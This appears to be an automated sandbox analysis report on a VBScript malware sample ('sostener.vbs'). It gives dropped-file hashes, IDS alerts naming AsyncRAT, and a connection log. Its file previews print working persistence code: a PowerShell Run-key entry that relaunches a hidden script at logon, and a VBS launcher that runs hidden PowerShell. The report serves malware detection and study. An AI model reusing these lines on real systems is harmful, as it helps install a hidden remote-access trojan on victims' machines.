                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):449312
                                    Entropy (8bit):3.3389756633800385
                                    Encrypted:false
                                    SSDEEP:96:OffffUffffUfffflDXc7lYm8ky0xbFi1msE4VIAGYALFCN8V0bf:s7OlYm8kyIhi1msJVIAGYAZCN8qf
                                    MD5:7038E85F1E6E6405981B64FF58358482
                                    SHA1:9DF67362F01D7A33A02A708FA6DA1C3A1214FC51
                                    SHA-256:A1A8E23D2F66E05DA76366469A1A344973FB1D775A943656DE0F90BF0306E447
                                    SHA-512:E9BC9B726B17F8F513D36054647537D6E494BFB0087306CA52CA0F1F95785AFA705EDE98BAAF71F19FEAD408F434A061A34AC6F0C457B0B77BDC51F93005C676
                                    Malicious:true
                                    Preview:......'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.....'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.........'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.....'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.........'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.....'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.........'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):266
                                    Entropy (8bit):5.0880789460298
                                    Encrypted:false
                                    SSDEEP:6:9HUomDuwZH1j0IQHMCsny1xsAu923fTflIcNBeR7n:9HUBVVj0YCsngzrbflIc3O7n
                                    MD5:B930483752D2B2AB88D34B9E04D675FC
                                    SHA1:30291A268B809A72129DE87E657C174B39EE535C
                                    SHA-256:DFAC04BE62652232A6F198861BC5BDFAE6C480BDECF5185F79D0025041D5EB56
                                    SHA-512:7EF86AD66591CBBAEC97F8CC18711EE018BD40B44BE15CF85A4BA9DC9EC30FCD9088F78C9D0D90068BCFB4205330D33ADA1D782FE49CB05A71F3BB71A5A8356D
                                    Malicious:true
                                    Preview:$teste = New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "_______________________-------------" -Value "Powershell.exe -WindowStyle hidden ""& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' """ -PropertyType "String" -force; {$teste}
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):179
                                    Entropy (8bit):5.073224268535385
                                    Encrypted:false
                                    SSDEEP:3:jJi0m81GX0HsoduSJJFIf9IMwblAUR1ftLCIAuUkh4E2J5xAIUuYLWoj5gWA:jJididMon81x87RBN3Au923f18jCWA
                                    MD5:B785CCDCDCE533FEF7D4CC4BC4FEC5B6
                                    SHA1:3F3DD11A370FB4844C345E404F77659BFFB462B9
                                    SHA-256:5F14B02C5F192C902ACF15460319F5234C0E6E4FA31556CDCDA11F6512AA9EE5
                                    SHA-512:CD8F9EEDCB5A0D532BE3254E9BD2ADE89A9F8FFA94B4059935032B579ABFBB99344123C2C390F14F5F4A742B902E14D986E475E1C9C42B9E8A20A0F82B76B8D3
                                    Malicious:true
                                    Preview:Set KaHuc = CreateObject("Wscript.shell")..KaHuc.run "powershell -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'" ,0, false
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6222
                                    Entropy (8bit):3.711709127807206
                                    Encrypted:false
                                    SSDEEP:96:/neCFod6kvhkvCCtFw2J7RzHnd2J7ROHn+:/nr62e2JT2Jj
                                    MD5:2283000431D25CAF6E4784922B9B717C
                                    SHA1:FC8EDB911FD64BA9A2AEFD1973247ABA3EB7795B
                                    SHA-256:8D7F6EA7F703CB62913D6E02EEAA3AC5783CF52D74AB080FCD857729C8EEE194
                                    SHA-512:D4EE15A2655656AB26D951A36BDD68545A054A341DF5F2ECCEFD402C94A7A3B6E80775993A51FA47627C58B44C10FD169801B3EB3E97D7B6AE5F1E1259F3706B
                                    Malicious:false
                                    Preview:...................................FL..................F.".. ...d.............z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........................t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl:Y.G....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....:Y.G..Roaming.@......DWSl:Y.G....C.......................`.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl:Y.G....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl:Y.G....E.....................f...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl:Y.G....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl:Y.G....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl:Y'G....q...........
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6222
                                    Entropy (8bit):3.711709127807206
                                    Encrypted:false
                                    SSDEEP:96:/neCFod6kvhkvCCtFw2J7RzHnd2J7ROHn+:/nr62e2JT2Jj
                                    MD5:2283000431D25CAF6E4784922B9B717C
                                    SHA1:FC8EDB911FD64BA9A2AEFD1973247ABA3EB7795B
                                    SHA-256:8D7F6EA7F703CB62913D6E02EEAA3AC5783CF52D74AB080FCD857729C8EEE194
                                    SHA-512:D4EE15A2655656AB26D951A36BDD68545A054A341DF5F2ECCEFD402C94A7A3B6E80775993A51FA47627C58B44C10FD169801B3EB3E97D7B6AE5F1E1259F3706B
                                    Malicious:false
                                    Preview:...................................FL..................F.".. ...d.............z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........................t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl:Y.G....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....:Y.G..Roaming.@......DWSl:Y.G....C.......................`.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl:Y.G....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl:Y.G....E.....................f...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl:Y.G....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl:Y.G....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl:Y'G....q...........
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6222
                                    Entropy (8bit):3.711709127807206
                                    Encrypted:false
                                    SSDEEP:96:/neCFod6kvhkvCCtFw2J7RzHnd2J7ROHn+:/nr62e2JT2Jj
                                    MD5:2283000431D25CAF6E4784922B9B717C
                                    SHA1:FC8EDB911FD64BA9A2AEFD1973247ABA3EB7795B
                                    SHA-256:8D7F6EA7F703CB62913D6E02EEAA3AC5783CF52D74AB080FCD857729C8EEE194
                                    SHA-512:D4EE15A2655656AB26D951A36BDD68545A054A341DF5F2ECCEFD402C94A7A3B6E80775993A51FA47627C58B44C10FD169801B3EB3E97D7B6AE5F1E1259F3706B
                                    Malicious:false
                                    Preview:...................................FL..................F.".. ...d.............z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........................t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl:Y.G....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....:Y.G..Roaming.@......DWSl:Y.G....C.......................`.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl:Y.G....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl:Y.G....E.....................f...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl:Y.G....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl:Y.G....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl:Y'G....q...........
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6222
                                    Entropy (8bit):3.7131081207491543
                                    Encrypted:false
                                    SSDEEP:96:PneCFOd6kvhkvCCtFw2J7ROHnd2J7ROHn+:Pnrk2e2Ja2Jj
                                    MD5:547D0BA89D94C7BD3B259CD75AC3DBC3
                                    SHA1:B208600C9B3516D0A29DFB1805266AD40BFD9AAC
                                    SHA-256:8F2E98FBB8E0FAD0DA653A852A72D71A0119A61A6948027E3112B1A47888E3F4
                                    SHA-512:3CD2F0F8805EB43AC487D8AF15BB60DC820C507DA237D5A987DA04F92A902B73879B0C94100349853D46325023E9235D709EE51164C23962CCFD57EBC0B8BFC3
                                    Malicious:false
                                    Preview:...................................FL..................F.".. ...d.............z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.............V"..........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl:Y.G....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....:Y.G..Roaming.@......DWSl:Y.G....C.......................`.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl:Y.G....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl:Y.G....E.....................f...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl:Y.G....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl:Y.G....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSl:Y(G....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl:Y'G....q...........
                                    File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Entropy (8bit):3.3389756633800385
                                    TrID:
                                    • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                    • MP3 audio (1001/1) 33.33%
                                    File name:sostener.vbs
                                    File size:449'312 bytes
                                    MD5:7038e85f1e6e6405981b64ff58358482
                                    SHA1:9df67362f01d7a33a02a708fa6da1c3a1214fc51
                                    SHA256:a1a8e23d2f66e05da76366469a1a344973fb1d775a943656de0f90bf0306e447
                                    SHA512:e9bc9b726b17f8f513d36054647537d6e494bfb0087306ca52ca0f1f95785afa705ede98baaf71f19fead408f434a061a34ac6f0c457b0b77bdc51f93005c676
                                    SSDEEP:96:OffffUffffUfffflDXc7lYm8ky0xbFi1msE4VIAGYALFCN8V0bf:s7OlYm8kyIhi1msJVIAGYAZCN8qf
                                    TLSH:78A4123D9B42848C95B230478EAA16ACC99213783F8E7FA9836142D4647F739DF5CDE1
                                    File Content Preview:......'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.....'.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C.K.../.R.G.,.E.T.R.A.S.0.A.R.A...I.C
                                    Icon Hash:68d69b8f86ab9a86
                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-09-26T10:57:02.264440+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54970515.235.85.194443TCP
                                    2024-09-26T10:57:03.426012+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1191.202.233.16980192.168.2.549706TCP
                                    2024-09-26T10:57:16.679373+02002842478ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)145.135.232.3835650192.168.2.549710TCP
                                    2024-09-26T10:57:16.679373+02002034847ET MALWARE Observed Malicious SSL Cert (AsyncRAT)145.135.232.3835650192.168.2.549710TCP
                                    2024-09-26T10:57:16.679373+02002848048ETPRO MALWARE Observed Malicious SSL Cert (AsyncRAT)145.135.232.3835650192.168.2.549710TCP
                                    2024-09-26T10:57:23.713260+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54971715.235.85.194443TCP
                                    2024-09-26T10:57:24.904005+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1191.202.233.16980192.168.2.549718TCP
                                    2024-09-26T10:58:04.651724+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1191.202.233.16980192.168.2.549721TCP
                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 26, 2024 10:57:00.832081079 CEST49704443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:57:00.832120895 CEST4434970415.235.85.194192.168.2.5
                                    Sep 26, 2024 10:57:00.832196951 CEST49704443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:57:00.841447115 CEST49704443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:57:00.841470003 CEST4434970415.235.85.194192.168.2.5
                                    Sep 26, 2024 10:57:01.346885920 CEST4434970415.235.85.194192.168.2.5
                                    Sep 26, 2024 10:57:01.346986055 CEST49704443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:57:01.350306034 CEST49704443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:57:01.350315094 CEST4434970415.235.85.194192.168.2.5
                                    Sep 26, 2024 10:57:01.351300001 CEST4434970415.235.85.194192.168.2.5
                                    Sep 26, 2024 10:57:01.361728907 CEST49704443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:57:01.407407045 CEST4434970415.235.85.194192.168.2.5
                                    Sep 26, 2024 10:57:01.479876995 CEST4434970415.235.85.194192.168.2.5
                                    Sep 26, 2024 10:57:01.480014086 CEST4434970415.235.85.194192.168.2.5
                                    Sep 26, 2024 10:57:01.480022907 CEST4434970415.235.85.194192.168.2.5
                                    Sep 26, 2024 10:57:01.480082035 CEST49704443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:57:01.480098009 CEST4434970415.235.85.194192.168.2.5
                                    Sep 26, 2024 10:57:01.480142117 CEST4434970415.235.85.194192.168.2.5
                                    Sep 26, 2024 10:57:01.480155945 CEST4434970415.235.85.194192.168.2.5
                                    Sep 26, 2024 10:57:01.480165958 CEST49704443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:57:01.480207920 CEST49704443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:57:01.483500957 CEST49704443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:57:01.619348049 CEST49705443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:57:01.619400024 CEST4434970515.235.85.194192.168.2.5
                                    Sep 26, 2024 10:57:01.619477034 CEST49705443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:57:01.619885921 CEST49705443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:57:01.619898081 CEST4434970515.235.85.194192.168.2.5
                                    Sep 26, 2024 10:57:02.109303951 CEST4434970515.235.85.194192.168.2.5
                                    Sep 26, 2024 10:57:02.109380007 CEST49705443192.168.2.515.235.85.194
                                    Sep 26, 2024 10:57:02.111705065 CEST49705443192.168.2.515.235.85.194
